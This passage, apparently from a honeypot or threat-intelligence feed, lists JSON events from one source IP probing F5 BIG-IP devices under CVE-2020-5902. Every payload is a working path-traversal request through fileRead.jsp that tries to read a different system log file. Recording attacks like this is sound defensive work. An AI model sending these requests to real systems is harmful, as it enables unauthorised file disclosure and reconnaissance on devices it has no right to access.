  810. "user_agent": "python-requests/2.23.0",
  811. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/pure-ftpd/pure-ftpd.log HTTP/1.1",
  812. "post_data": "",
  813. "target_port": 443,
  814. "protocol": "tcp",
  815. "tags": [
  816. {
  817. "cve": "CVE-2020-5902",
  818. "category": "Platform",
  819. "description": "F5 BIG-IP Configuration Utility RCE"
  820. }
  821. ],
  822. "event_count": 1,
  823. "first_seen": "2020-07-09T08:06:52Z",
  824. "last_seen": "2020-07-09T08:06:52Z"
  825. },
  826. {
  827. "event_id": "8ea7d417d7e867f20f5ceb2709116e2110f2e3dc01bae9246b5a993032352a07",
  828. "source_ip_address": "85.248.227.163",
  829. "country": "SK",
  830. "user_agent": "python-requests/2.23.0",
  831. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/pureftpd.log HTTP/1.1",
  832. "post_data": "",
  833. "target_port": 443,
  834. "protocol": "tcp",
  835. "tags": [
  836. {
  837. "cve": "CVE-2020-5902",
  838. "category": "Platform",
  839. "description": "F5 BIG-IP Configuration Utility RCE"
  840. }
  841. ],
  842. "event_count": 1,
  843. "first_seen": "2020-07-09T08:06:51Z",
  844. "last_seen": "2020-07-09T08:06:51Z"
  845. },
  846. {
  847. "event_id": "e351e73d4f81706070e36b5797400852c0cf941e62575dc891152db70852eb7b",
  848. "source_ip_address": "85.248.227.163",
  849. "country": "SK",
  850. "user_agent": "python-requests/2.23.0",
  851. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/proftpd HTTP/1.1",
  852. "post_data": "",
  853. "target_port": 443,
  854. "protocol": "tcp",
  855. "tags": [
  856. {
  857. "cve": "CVE-2020-5902",
  858. "category": "Platform",
  859. "description": "F5 BIG-IP Configuration Utility RCE"
  860. }
  861. ],
  862. "event_count": 1,
  863. "first_seen": "2020-07-09T08:06:49Z",
  864. "last_seen": "2020-07-09T08:06:49Z"
  865. },
  866. {
  867. "event_id": "a29820df1247067d04bf33964e5ef8e529f5ff65cc098eba56da3ffeb8b3b0a7",
  868. "source_ip_address": "85.248.227.163",
  869. "country": "SK",
  870. "user_agent": "python-requests/2.23.0",
  871. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/mysql/mysql-slow.log HTTP/1.1",
  872. "post_data": "",
  873. "target_port": 443,
  874. "protocol": "tcp",
  875. "tags": [
  876. {
  877. "cve": "CVE-2020-5902",
  878. "category": "Platform",
  879. "description": "F5 BIG-IP Configuration Utility RCE"
  880. }
  881. ],
  882. "event_count": 1,
  883. "first_seen": "2020-07-09T08:06:48Z",
  884. "last_seen": "2020-07-09T08:06:48Z"
  885. },
  886. {
  887. "event_id": "9a7082664225e2718314b0f055868d446e5916dd90c61cc398cbb53953bc4b99",
  888. "source_ip_address": "85.248.227.163",
  889. "country": "SK",
  890. "user_agent": "python-requests/2.23.0",
  891. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/mysql/mysql.log HTTP/1.1",
  892. "post_data": "",
  893. "target_port": 443,
  894. "protocol": "tcp",
  895. "tags": [
  896. {
  897. "cve": "CVE-2020-5902",
  898. "category": "Platform",
  899. "description": "F5 BIG-IP Configuration Utility RCE"
  900. }
  901. ],
  902. "event_count": 1,
  903. "first_seen": "2020-07-09T08:06:46Z",
  904. "last_seen": "2020-07-09T08:06:46Z"
  905. },
  906. {
  907. "event_id": "e826729509fb231f3f598463406845a8f2c3a96d87de0740c16209600861750f",
  908. "source_ip_address": "85.248.227.163",
  909. "country": "SK",
  910. "user_agent": "python-requests/2.23.0",
  911. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/mysql/mysql-bin.log HTTP/1.1",
  912. "post_data": "",
  913. "target_port": 443,
  914. "protocol": "tcp",
  915. "tags": [
  916. {
  917. "cve": "CVE-2020-5902",
  918. "category": "Platform",
  919. "description": "F5 BIG-IP Configuration Utility RCE"
  920. }
  921. ],
  922. "event_count": 1,
  923. "first_seen": "2020-07-09T08:06:45Z",
  924. "last_seen": "2020-07-09T08:06:45Z"
  925. },
  926. {
  927. "event_id": "0a8411594e2787f47c345831725db5b2e090d775369b942509ab64365766efeb",
  928. "source_ip_address": "85.248.227.163",
  929. "country": "SK",
  930. "user_agent": "python-requests/2.23.0",
  931. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/mysql.log HTTP/1.1",
  932. "post_data": "",
  933. "target_port": 443,
  934. "protocol": "tcp",
  935. "tags": [
  936. {
  937. "cve": "CVE-2020-5902",
  938. "category": "Platform",
  939. "description": "F5 BIG-IP Configuration Utility RCE"
  940. }
  941. ],
  942. "event_count": 1,
  943. "first_seen": "2020-07-09T08:06:43Z",
  944. "last_seen": "2020-07-09T08:06:43Z"
  945. },
  946. {
  947. "event_id": "df7dd29349d1d5af7497b2c9a026c657b6825f97afcc07e6c46fa09675ffabfc",
  948. "source_ip_address": "85.248.227.163",
  949. "country": "SK",
  950. "user_agent": "python-requests/2.23.0",
  951. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/mysqlderror.log HTTP/1.1",
  952. "post_data": "",
  953. "target_port": 443,
  954. "protocol": "tcp",
  955. "tags": [
  956. {
  957. "cve": "CVE-2020-5902",
  958. "category": "Platform",
  959. "description": "F5 BIG-IP Configuration Utility RCE"
  960. }
  961. ],
  962. "event_count": 1,
  963. "first_seen": "2020-07-09T08:06:42Z",
  964. "last_seen": "2020-07-09T08:06:42Z"
  965. },
  966. {
  967. "event_id": "741b94082bf9f14d4480c7389224ab160be07d470a583c9d7b20ba8b2463bd5b",
  968. "source_ip_address": "85.248.227.163",
  969. "country": "SK",
  970. "user_agent": "python-requests/2.23.0",
  971. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/messages HTTP/1.1",
  972. "post_data": "",
  973. "target_port": 443,
  974. "protocol": "tcp",
  975. "tags": [
  976. {
  977. "cve": "CVE-2020-5902",
  978. "category": "Platform",
  979. "description": "F5 BIG-IP Configuration Utility RCE"
  980. }
  981. ],
  982. "event_count": 1,
  983. "first_seen": "2020-07-09T08:06:41Z",
  984. "last_seen": "2020-07-09T08:06:41Z"
  985. },
  986. {
  987. "event_id": "2dffa1756507e8cd72119ab11dd238ac281ca348f419bf8c5e00dc5ffc9e6db7",
  988. "source_ip_address": "85.248.227.163",
  989. "country": "SK",
  990. "user_agent": "python-requests/2.23.0",
  991. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/message HTTP/1.1",
  992. "post_data": "",
  993. "target_port": 443,
  994. "protocol": "tcp",
  995. "tags": [
  996. {
  997. "cve": "CVE-2020-5902",
  998. "category": "Platform",
  999. "description": "F5 BIG-IP Configuration Utility RCE"
  1000. }
  1001. ],
  1002. "event_count": 1,
  1003. "first_seen": "2020-07-09T08:06:39Z",
  1004. "last_seen": "2020-07-09T08:06:39Z"
  1005. },
  1006. {
  1007. "event_id": "4144232122e88a18bc1f653db013d12636e85fdefb491fb92ac1959b4bd8fd56",
  1008. "source_ip_address": "85.248.227.163",
  1009. "country": "SK",
  1010. "user_agent": "python-requests/2.23.0",
  1011. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/mail.warn HTTP/1.1",
  1012. "post_data": "",
  1013. "target_port": 443,
  1014. "protocol": "tcp",
  1015. "tags": [
  1016. {
  1017. "cve": "CVE-2020-5902",
  1018. "category": "Platform",
  1019. "description": "F5 BIG-IP Configuration Utility RCE"
  1020. }
  1021. ],
  1022. "event_count": 1,
  1023. "first_seen": "2020-07-09T08:06:38Z",
  1024. "last_seen": "2020-07-09T08:06:38Z"
  1025. },
  1026. {
  1027. "event_id": "e43194a39381e3939b3a24d98a0b7557909dc54efedefb02865f314792ae395e",
  1028. "source_ip_address": "85.248.227.163",
  1029. "country": "SK",
  1030. "user_agent": "python-requests/2.23.0",
  1031. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/maillog HTTP/1.1",
  1032. "post_data": "",
  1033. "target_port": 443,
  1034. "protocol": "tcp",
  1035. "tags": [
  1036. {
  1037. "cve": "CVE-2020-5902",
  1038. "category": "Platform",
  1039. "description": "F5 BIG-IP Configuration Utility RCE"
  1040. }
  1041. ],
  1042. "event_count": 1,
  1043. "first_seen": "2020-07-09T08:06:36Z",
  1044. "last_seen": "2020-07-09T08:06:36Z"
  1045. },
  1046. {
  1047. "event_id": "1cdac0553c263eeee5cc2c99efacc0296fae45faed1385c1c92509678153eeed",
  1048. "source_ip_address": "85.248.227.163",
  1049. "country": "SK",
  1050. "user_agent": "python-requests/2.23.0",
  1051. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/mail.log HTTP/1.1",
  1052. "post_data": "",
  1053. "target_port": 443,
  1054. "protocol": "tcp",
  1055. "tags": [
  1056. {
  1057. "cve": "CVE-2020-5902",
  1058. "category": "Platform",
  1059. "description": "F5 BIG-IP Configuration Utility RCE"
  1060. }
  1061. ],
  1062. "event_count": 1,
  1063. "first_seen": "2020-07-09T08:06:35Z",
  1064. "last_seen": "2020-07-09T08:06:35Z"
  1065. },
  1066. {
  1067. "event_id": "d7b263fca20d1823bfc57aae5c3f18cfc1d46a301570df2e4fac9e186ba7fb13",
  1068. "source_ip_address": "85.248.227.163",
  1069. "country": "SK",
  1070. "user_agent": "python-requests/2.23.0",
  1071. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/mail.info HTTP/1.1",
  1072. "post_data": "",
  1073. "target_port": 443,
  1074. "protocol": "tcp",
  1075. "tags": [
  1076. {
  1077. "cve": "CVE-2020-5902",
  1078. "category": "Platform",
  1079. "description": "F5 BIG-IP Configuration Utility RCE"
  1080. }
  1081. ],
  1082. "event_count": 1,
  1083. "first_seen": "2020-07-09T08:06:33Z",
  1084. "last_seen": "2020-07-09T08:06:33Z"
  1085. },
  1086. {
  1087. "event_id": "3346f175b907f12fdcde1117db4c5afd58a450a287906ed03133565ac1000024",
  1088. "source_ip_address": "85.248.227.163",
  1089. "country": "SK",
  1090. "user_agent": "python-requests/2.23.0",
  1091. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/lighttpd/lighttpd.error.log HTTP/1.1",
  1092. "post_data": "",
  1093. "target_port": 443,
  1094. "protocol": "tcp",
  1095. "tags": [
  1096. {
  1097. "cve": "CVE-2020-5902",
  1098. "category": "Platform",
  1099. "description": "F5 BIG-IP Configuration Utility RCE"
  1100. }
  1101. ],
  1102. "event_count": 1,
  1103. "first_seen": "2020-07-09T08:06:32Z",
  1104. "last_seen": "2020-07-09T08:06:32Z"
  1105. },
  1106. {
  1107. "event_id": "09f84cf487134476879c09141864046a608579b3d5290078853fadd27fff4046",
  1108. "source_ip_address": "85.248.227.163",
  1109. "country": "SK",
  1110. "user_agent": "python-requests/2.23.0",
  1111. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/lighttpd/lighttpd.access.log HTTP/1.1",
  1112. "post_data": "",
  1113. "target_port": 443,
  1114. "protocol": "tcp",
  1115. "tags": [
  1116. {
  1117. "cve": "CVE-2020-5902",
  1118. "category": "Platform",
  1119. "description": "F5 BIG-IP Configuration Utility RCE"
  1120. }
  1121. ],
  1122. "event_count": 1,
  1123. "first_seen": "2020-07-09T08:06:31Z",
  1124. "last_seen": "2020-07-09T08:06:31Z"
  1125. },
  1126. {
  1127. "event_id": "e64f7a0ff7806e804c16f7085ded6765e04e02305abe2ec73bc073fc7251e911",
  1128. "source_ip_address": "85.248.227.163",
  1129. "country": "SK",
  1130. "user_agent": "python-requests/2.23.0",
  1131. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/lighttpd/error.log HTTP/1.1",
  1132. "post_data": "",
  1133. "target_port": 443,
  1134. "protocol": "tcp",
  1135. "tags": [
  1136. {
  1137. "cve": "CVE-2020-5902",
  1138. "category": "Platform",
  1139. "description": "F5 BIG-IP Configuration Utility RCE"
  1140. }
  1141. ],
  1142. "event_count": 1,
  1143. "first_seen": "2020-07-09T08:06:29Z",
  1144. "last_seen": "2020-07-09T08:06:29Z"
  1145. },
  1146. {
  1147. "event_id": "d636d8d024b9be88bc8ec8f6135252b4b923784b3232318dc9a2abd5bcb6e7e2",
  1148. "source_ip_address": "85.248.227.163",
  1149. "country": "SK",
  1150. "user_agent": "python-requests/2.23.0",
  1151. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/lighttpd/access.log HTTP/1.1",
  1152. "post_data": "",
  1153. "target_port": 443,
  1154. "protocol": "tcp",
  1155. "tags": [
  1156. {
  1157. "cve": "CVE-2020-5902",
  1158. "category": "Platform",
  1159. "description": "F5 BIG-IP Configuration Utility RCE"
  1160. }
  1161. ],
  1162. "event_count": 1,
  1163. "first_seen": "2020-07-09T08:06:28Z",
  1164. "last_seen": "2020-07-09T08:06:28Z"
  1165. },
  1166. {
  1167. "event_id": "1f435ea382b460e4dfc2b15d2d624bfaa678cb5dc93aaad28bc005e250b90116",
  1168. "source_ip_address": "85.248.227.163",
  1169. "country": "SK",
  1170. "user_agent": "python-requests/2.23.0",
  1171. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/lastlog HTTP/1.1",
  1172. "post_data": "",
  1173. "target_port": 443,
  1174. "protocol": "tcp",
  1175. "tags": [
  1176. {
  1177. "cve": "CVE-2020-5902",
  1178. "category": "Platform",
  1179. "description": "F5 BIG-IP Configuration Utility RCE"
  1180. }
  1181. ],
  1182. "event_count": 1,
  1183. "first_seen": "2020-07-09T08:06:26Z",
  1184. "last_seen": "2020-07-09T08:06:26Z"
  1185. },
  1186. {
  1187. "event_id": "f985fb061188f9f0cf4da214a032ccbd323cd70dbe2ef4b47a8c4c668cf77c78",
  1188. "source_ip_address": "85.248.227.163",
  1189. "country": "SK",
  1190. "user_agent": "python-requests/2.23.0",
  1191. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/kern.log HTTP/1.1",
  1192. "post_data": "",
  1193. "target_port": 443,
  1194. "protocol": "tcp",
  1195. "tags": [
  1196. {
  1197. "cve": "CVE-2020-5902",
  1198. "category": "Platform",
  1199. "description": "F5 BIG-IP Configuration Utility RCE"
  1200. }
  1201. ],
  1202. "event_count": 1,
  1203. "first_seen": "2020-07-09T08:06:25Z",
  1204. "last_seen": "2020-07-09T08:06:25Z"
  1205. },
  1206. {
  1207. "event_id": "580fd325745300d081053098a8c51a0934cc8d5c1271ba18b0061af4e10473cb",
  1208. "source_ip_address": "85.248.227.163",
  1209. "country": "SK",
  1210. "user_agent": "python-requests/2.23.0",
  1211. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/httpsd/ssl_log HTTP/1.1",
  1212. "post_data": "",
  1213. "target_port": 443,
  1214. "protocol": "tcp",
  1215. "tags": [
  1216. {
  1217. "cve": "CVE-2020-5902",
  1218. "category": "Platform",
  1219. "description": "F5 BIG-IP Configuration Utility RCE"
  1220. }
  1221. ],
  1222. "event_count": 1,
  1223. "first_seen": "2020-07-09T08:06:23Z",
  1224. "last_seen": "2020-07-09T08:06:23Z"
  1225. },
  1226. {
  1227. "event_id": "1bdfe671fff656f1d859b9c57b2b98ea4f3ccb7d6de9130faf8230b56bbf1621",
  1228. "source_ip_address": "85.248.227.163",
  1229. "country": "SK",
  1230. "user_agent": "python-requests/2.23.0",
  1231. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/httpsd/ssl.access_log HTTP/1.1",
  1232. "post_data": "",
  1233. "target_port": 443,
  1234. "protocol": "tcp",
  1235. "tags": [
  1236. {
  1237. "cve": "CVE-2020-5902",
  1238. "category": "Platform",
  1239. "description": "F5 BIG-IP Configuration Utility RCE"
  1240. }
  1241. ],
  1242. "event_count": 1,
  1243. "first_seen": "2020-07-09T08:06:22Z",
  1244. "last_seen": "2020-07-09T08:06:22Z"
  1245. },
  1246. {
  1247. "event_id": "9511ca6499ce3919d36b6ce1466b222614a5f2caa8494b2a52ed4105ec2bc069",
  1248. "source_ip_address": "85.248.227.163",
  1249. "country": "SK",
  1250. "user_agent": "python-requests/2.23.0",
  1251. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/httpd/error.log HTTP/1.1",
  1252. "post_data": "",
  1253. "target_port": 443,
  1254. "protocol": "tcp",
  1255. "tags": [
  1256. {
  1257. "cve": "CVE-2020-5902",
  1258. "category": "Platform",
  1259. "description": "F5 BIG-IP Configuration Utility RCE"
  1260. }
  1261. ],
  1262. "event_count": 1,
  1263. "first_seen": "2020-07-09T08:06:20Z",
  1264. "last_seen": "2020-07-09T08:06:20Z"
  1265. },
  1266. {
  1267. "event_id": "7bfa8a7f2f8fdf1dcd54008499de08766d33bd87f13187769714f1c58d33d91f",
  1268. "source_ip_address": "85.248.227.163",
  1269. "country": "SK",
  1270. "user_agent": "python-requests/2.23.0",
  1271. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/httpd/error_log HTTP/1.1",
  1272. "post_data": "",
  1273. "target_port": 443,
  1274. "protocol": "tcp",
  1275. "tags": [
  1276. {
  1277. "cve": "CVE-2020-5902",
  1278. "category": "Platform",
  1279. "description": "F5 BIG-IP Configuration Utility RCE"
  1280. }
  1281. ],
  1282. "event_count": 1,
  1283. "first_seen": "2020-07-09T08:06:19Z",
  1284. "last_seen": "2020-07-09T08:06:19Z"
  1285. },
  1286. {
  1287. "event_id": "0d5a03308cf00e801c6f00e9a4b8719e54abb4609bde19baba58f76d384674b5",
  1288. "source_ip_address": "85.248.227.163",
  1289. "country": "SK",
  1290. "user_agent": "python-requests/2.23.0",
  1291. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/httpd/access.log HTTP/1.1",
  1292. "post_data": "",
  1293. "target_port": 443,
  1294. "protocol": "tcp",
  1295. "tags": [
  1296. {
  1297. "cve": "CVE-2020-5902",
  1298. "category": "Platform",
  1299. "description": "F5 BIG-IP Configuration Utility RCE"
  1300. }
  1301. ],
  1302. "event_count": 1,
  1303. "first_seen": "2020-07-09T08:06:17Z",
  1304. "last_seen": "2020-07-09T08:06:17Z"
  1305. },
  1306. {
  1307. "event_id": "b3cefc3a6353310fefdf7e55cc72016d8843f91836e4ad4ce78c6c7656dcea5d",
  1308. "source_ip_address": "85.248.227.163",
  1309. "country": "SK",
  1310. "user_agent": "python-requests/2.23.0",
  1311. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/httpd/access_log HTTP/1.1",
  1312. "post_data": "",
  1313. "target_port": 443,
  1314. "protocol": "tcp",
  1315. "tags": [
  1316. {
  1317. "cve": "CVE-2020-5902",
  1318. "category": "Platform",
  1319. "description": "F5 BIG-IP Configuration Utility RCE"
  1320. }
  1321. ],
  1322. "event_count": 1,
  1323. "first_seen": "2020-07-09T08:06:16Z",
  1324. "last_seen": "2020-07-09T08:06:16Z"
  1325. },
  1326. {
  1327. "event_id": "01698b6689243d516e4d4ca715784ac603bd0bdbdb473482f079886c36796567",
  1328. "source_ip_address": "85.248.227.163",
  1329. "country": "SK",
  1330. "user_agent": "python-requests/2.23.0",
  1331. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/ftp-proxy/ftp-proxy.log HTTP/1.1",
  1332. "post_data": "",
  1333. "target_port": 443,
  1334. "protocol": "tcp",
  1335. "tags": [
  1336. {
  1337. "cve": "CVE-2020-5902",
  1338. "category": "Platform",
  1339. "description": "F5 BIG-IP Configuration Utility RCE"
  1340. }
  1341. ],
  1342. "event_count": 1,
  1343. "first_seen": "2020-07-09T08:06:14Z",
  1344. "last_seen": "2020-07-09T08:06:14Z"
  1345. },
  1346. {
  1347. "event_id": "6da873a28c5d44cc3094114f63660d37b1ce9ac491f2270df34d9ea7ed7d61d8",
  1348. "source_ip_address": "85.248.227.163",
  1349. "country": "SK",
  1350. "user_agent": "python-requests/2.23.0",
  1351. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/ftp-proxy HTTP/1.1",
  1352. "post_data": "",
  1353. "target_port": 443,
  1354. "protocol": "tcp",
  1355. "tags": [
  1356. {
  1357. "cve": "CVE-2020-5902",
  1358. "category": "Platform",
  1359. "description": "F5 BIG-IP Configuration Utility RCE"
  1360. }
  1361. ],
  1362. "event_count": 1,
  1363. "first_seen": "2020-07-09T08:06:13Z",
  1364. "last_seen": "2020-07-09T08:06:13Z"
  1365. },
  1366. {
  1367. "event_id": "26ce32f9f35b8a436e75ef62d53c6c547e30fcaf394fc0fbbc4d6ca455677079",
  1368. "source_ip_address": "85.248.227.163",
  1369. "country": "SK",
  1370. "user_agent": "python-requests/2.23.0",
  1371. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/ftplog HTTP/1.1",
  1372. "post_data": "",
  1373. "target_port": 443,
  1374. "protocol": "tcp",
  1375. "tags": [
  1376. {
  1377. "cve": "CVE-2020-5902",
  1378. "category": "Platform",
  1379. "description": "F5 BIG-IP Configuration Utility RCE"
  1380. }
  1381. ],
  1382. "event_count": 1,
  1383. "first_seen": "2020-07-09T08:06:11Z",
  1384. "last_seen": "2020-07-09T08:06:11Z"
  1385. },
  1386. {
  1387. "event_id": "a4c009fca5769ad48a58d958684060d4a33638d614f9361f53f66b752483d45c",
  1388. "source_ip_address": "85.248.227.163",
  1389. "country": "SK",
  1390. "user_agent": "python-requests/2.23.0",
  1391. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/faillog HTTP/1.1",
  1392. "post_data": "",
  1393. "target_port": 443,
  1394. "protocol": "tcp",
  1395. "tags": [
  1396. {
  1397. "cve": "CVE-2020-5902",
  1398. "category": "Platform",
  1399. "description": "F5 BIG-IP Configuration Utility RCE"
  1400. }
  1401. ],
  1402. "event_count": 1,
  1403. "first_seen": "2020-07-09T08:06:09Z",
  1404. "last_seen": "2020-07-09T08:06:09Z"
  1405. },
  1406. {
  1407. "event_id": "6562f47cf2935e67a6147f46990404e56ccbe076224d7bc20e02a5dfb4a4a1a3",
  1408. "source_ip_address": "85.248.227.163",
  1409. "country": "SK",
  1410. "user_agent": "python-requests/2.23.0",
  1411. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/exim/rejectlog HTTP/1.1",
  1412. "post_data": "",
  1413. "target_port": 443,
  1414. "protocol": "tcp",
  1415. "tags": [
  1416. {
  1417. "cve": "CVE-2020-5902",
  1418. "category": "Platform",
  1419. "description": "F5 BIG-IP Configuration Utility RCE"
  1420. }
  1421. ],
  1422. "event_count": 1,
  1423. "first_seen": "2020-07-09T08:06:08Z",
  1424. "last_seen": "2020-07-09T08:06:08Z"
  1425. },
  1426. {
  1427. "event_id": "fcefde5da3894863f2e82ceaa65177bbcae16cb617e53f5f10aa0ab9408cf0da",
  1428. "source_ip_address": "85.248.227.163",
  1429. "country": "SK",
  1430. "user_agent": "python-requests/2.23.0",
  1431. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/exim_rejectlog HTTP/1.1",
  1432. "post_data": "",
  1433. "target_port": 443,
  1434. "protocol": "tcp",
  1435. "tags": [
  1436. {
  1437. "cve": "CVE-2020-5902",
  1438. "category": "Platform",
  1439. "description": "F5 BIG-IP Configuration Utility RCE"
  1440. }
  1441. ],
  1442. "event_count": 1,
  1443. "first_seen": "2020-07-09T08:06:06Z",
  1444. "last_seen": "2020-07-09T08:06:06Z"
  1445. },
  1446. {
  1447. "event_id": "fe0e25cf2feb12fd54d6e1a35381b398f030ddaa4e1514f66cec5560eb9182c8",
  1448. "source_ip_address": "85.248.227.163",
  1449. "country": "SK",
  1450. "user_agent": "python-requests/2.23.0",
  1451. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/exim.paniclog HTTP/1.1",
  1452. "post_data": "",
  1453. "target_port": 443,
  1454. "protocol": "tcp",
  1455. "tags": [
  1456. {
  1457. "cve": "CVE-2020-5902",
  1458. "category": "Platform",
  1459. "description": "F5 BIG-IP Configuration Utility RCE"
  1460. }
  1461. ],
  1462. "event_count": 1,
  1463. "first_seen": "2020-07-09T08:06:04Z",
  1464. "last_seen": "2020-07-09T08:06:04Z"
  1465. },
  1466. {
  1467. "event_id": "9219b3b0903941ae4c9cfff647e9bd5bdefbedb3d41cacbf84ee23dd0bd46e38",
  1468. "source_ip_address": "85.248.227.163",
  1469. "country": "SK",
  1470. "user_agent": "python-requests/2.23.0",
  1471. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/exim_paniclog HTTP/1.1",
  1472. "post_data": "",
  1473. "target_port": 443,
  1474. "protocol": "tcp",
  1475. "tags": [
  1476. {
  1477. "cve": "CVE-2020-5902",
  1478. "category": "Platform",
  1479. "description": "F5 BIG-IP Configuration Utility RCE"
  1480. }
  1481. ],
  1482. "event_count": 1,
  1483. "first_seen": "2020-07-09T08:06:02Z",
  1484. "last_seen": "2020-07-09T08:06:02Z"
  1485. },
  1486. {
  1487. "event_id": "f67150546bc02ad1910fb11fa269f3f56d76e22d4244a36fd233073fe065d017",
  1488. "source_ip_address": "85.248.227.163",
  1489. "country": "SK",
  1490. "user_agent": "python-requests/2.23.0",
  1491. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/exim/mainlog HTTP/1.1",
  1492. "post_data": "",
  1493. "target_port": 443,
  1494. "protocol": "tcp",
  1495. "tags": [
  1496. {
  1497. "cve": "CVE-2020-5902",
  1498. "category": "Platform",
  1499. "description": "F5 BIG-IP Configuration Utility RCE"
  1500. }
  1501. ],
  1502. "event_count": 1,
  1503. "first_seen": "2020-07-09T08:06:01Z",
  1504. "last_seen": "2020-07-09T08:06:01Z"
  1505. },
  1506. {
  1507. "event_id": "a3fe6b834229be8d3628b14e5e1709cd6dc916f478bc809b73f4948e6cba5f7d",
  1508. "source_ip_address": "85.248.227.163",
  1509. "country": "SK",
  1510. "user_agent": "python-requests/2.23.0",
  1511. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/exim_mainlog HTTP/1.1",
  1512. "post_data": "",
  1513. "target_port": 443,
  1514. "protocol": "tcp",
  1515. "tags": [
  1516. {
  1517. "cve": "CVE-2020-5902",
  1518. "category": "Platform",
  1519. "description": "F5 BIG-IP Configuration Utility RCE"
  1520. }
  1521. ],
  1522. "event_count": 1,
  1523. "first_seen": "2020-07-09T08:05:59Z",
  1524. "last_seen": "2020-07-09T08:05:59Z"
  1525. },
  1526. {
  1527. "event_id": "2713a7465e16b3e3a42536be90d04a27fe3542f6c3c624b4277e7d32d90da045",
  1528. "source_ip_address": "85.248.227.163",
  1529. "country": "SK",
  1530. "user_agent": "python-requests/2.23.0",
  1531. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/dpkg.log HTTP/1.1",
  1532. "post_data": "",
  1533. "target_port": 443,
  1534. "protocol": "tcp",
  1535. "tags": [
  1536. {
  1537. "cve": "CVE-2020-5902",
  1538. "category": "Platform",
  1539. "description": "F5 BIG-IP Configuration Utility RCE"
  1540. }
  1541. ],
  1542. "event_count": 1,
  1543. "first_seen": "2020-07-09T08:05:58Z",
  1544. "last_seen": "2020-07-09T08:05:58Z"
  1545. },
  1546. {
  1547. "event_id": "4b5a132aa60808bb5f7e4efc984fedd49a62fbf12c61c4c678eca9088a9237ee",
  1548. "source_ip_address": "85.248.227.163",
  1549. "country": "SK",
  1550. "user_agent": "python-requests/2.23.0",
  1551. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/dmesg HTTP/1.1",
  1552. "post_data": "",
  1553. "target_port": 443,
  1554. "protocol": "tcp",
  1555. "tags": [
  1556. {
  1557. "cve": "CVE-2020-5902",
  1558. "category": "Platform",
  1559. "description": "F5 BIG-IP Configuration Utility RCE"
  1560. }
  1561. ],
  1562. "event_count": 1,
  1563. "first_seen": "2020-07-09T08:05:57Z",
  1564. "last_seen": "2020-07-09T08:05:57Z"
  1565. },
  1566. {
  1567. "event_id": "8bd3cd34f120d5829c46116be9ab7af32a492099c31df8124ea1a81937ff22b8",
  1568. "source_ip_address": "85.248.227.163",
  1569. "country": "SK",
  1570. "user_agent": "python-requests/2.23.0",
  1571. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/debug HTTP/1.1",
  1572. "post_data": "",
  1573. "target_port": 443,
  1574. "protocol": "tcp",
  1575. "tags": [
  1576. {
  1577. "cve": "CVE-2020-5902",
  1578. "category": "Platform",
  1579. "description": "F5 BIG-IP Configuration Utility RCE"
  1580. }
  1581. ],
  1582. "event_count": 1,
  1583. "first_seen": "2020-07-09T08:05:55Z",
